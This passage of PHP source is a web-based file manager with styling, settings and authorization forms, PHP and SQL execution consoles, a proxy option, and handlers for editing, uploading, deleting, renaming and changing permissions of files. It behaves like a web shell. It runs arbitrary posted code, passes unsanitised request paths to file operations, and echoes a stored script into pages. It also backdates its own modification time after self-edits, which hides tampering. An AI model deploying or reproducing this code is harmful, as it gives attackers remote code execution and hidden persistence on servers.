url("data:image/png;base64,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"); } .file { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU05QZlmDJBVaOaUt2ooVQRNY9aQq2htlKvUYeoEzR1mjnNgxZJS6WtopXTGmgXaPdpr+h0uhHdlR5Ol9BX0svpR+iX6AP0dwwNhhWDx4hnKBmbGAcYZxl3GK+YTKYZ04sZx1QwNzHrmOeZD5lvVVgqtip8FZHKCpVKlSaVGyovVKmqpqreqgtV81XLVI+pXlN9rkZVM1PjqQnUlqtVqp1Q61MbU2epO6iHqmeob1Q/pH5Z/YkGWcNMw09DpFGgsV/jvMYgC2MZs3gsIWsNq4Z1gTXEJrHN2Xx2KruY/R27iz2qqaE5QzNKM1ezUvOUZj8H45hx+Jx0TgnnKKeX836K3hTvKeIpG6Y0TLkxZVxrqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6feeb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbmmKaY7TDtMx83MzaLN1pk1mz0x1zLnm+eb15vft2BaeFostqi2uGVJsuRaplnutrxuhVo5WaVYVVpds0atna0l1rutu6cRp7lOk06rntZnw7Dxtsm2qbcZsOXYBtuutm22fWFnYhdnt8Wuw+6TvZN9un2N/T0HDYfZDqsdWh1+c7RyFDpWOt6azpzuP33F9JbpL2dYzxDP2DPjthPLKcRpnVOb00dnF2e5c4PziIuJS4LLLpc+Lpsbxt3IveRKdPVxXeF60vWdm7Obwu2o26/uNu5p7ofcn8w0nymeWTNz0MPIQ+BR5dE/C5+VMGvfrH5PQ0+BZ7XnIy9jL5FXrdewt6V3qvdh7xc+9j5yn+M+4zw33jLeWV/MN8C3yLfLT8Nvnl+F30N/I/9k/3r/0QCngCUBZwOJgUGBWwL7+Hp8Ib+OPzrbZfay2e1BjKC5QRVBj4KtguXBrSFoyOyQrSH355jOkc5pDoVQfujW0Adh5mGLw34MJ4WHhVeGP45wiFga0TGXNXfR3ENz30T6RJZE3ptnMU85ry1KNSo+qi5qPNo3ujS6P8YuZlnM1VidWElsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2QqboVFoo1yoHsmdlV2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wtVCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMTg5XEETAAAB8klEQVQ4y3WSMW/TQBiGn++7sx3XddMAIm0nkCohRQiJDSExdAl/ATEwIPEzkFiYYGRlyMyGxMLExFhByy9ACAaa0gYnDol9x9DYiVs46dPnk/w+9973ngDJ/v7++yAICj+fI0HA/5ZzDu89zjmOjo6yfr//wAJBr9e7G4YhxWSCRFH902qVZdnYx3F8DIQWIMsy1pIEXxSoMfVJ50FeDKUrcGcwAVCANE1ptVqoKqqKMab+rvZhvMbn1y/wg6dItIaIAGABTk5OSJIE9R4AEUFVcc7VPf92wPbtlHz3CRt+jqpSO2i328RxXNtehYgIprXO+ONzrl3+gtEAEW0ChsMhWZY17l5DjOX00xuu7oz5ET3kUmejBteATqdDHMewEK9CPDA/fMVs6xab23tnIv2Hg/F43Jy494gNGH54SffGBqfrj0laS3HDQZqmhGGIW8RWxffn+Dv251t+te/R3enhEUSWVQNGoxF5nuNXxKKGrwfvCHbv4K88wmiJ6nKwjRijKMIYQzmfI4voRIQi3uZ39z5bm50zaHXq4v41YDqdgghSlohzAMymOddv7mGMUJZlI9ZqwE0Hqoi1F15hJVrtCxe+AkgYhgTWIsZgoggRwVp7YWCryxijFWAyGAyeIVKocyLW1o+o6ucL8Hmez4DxX+8dALG7MeVUAAAAAElFTkSuQmCC"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg .= __('Found in files').' ('.count($search_data).'):<br>'; foreach ($search_data as $filename) { $msg .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> '; } } else { $msg .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = 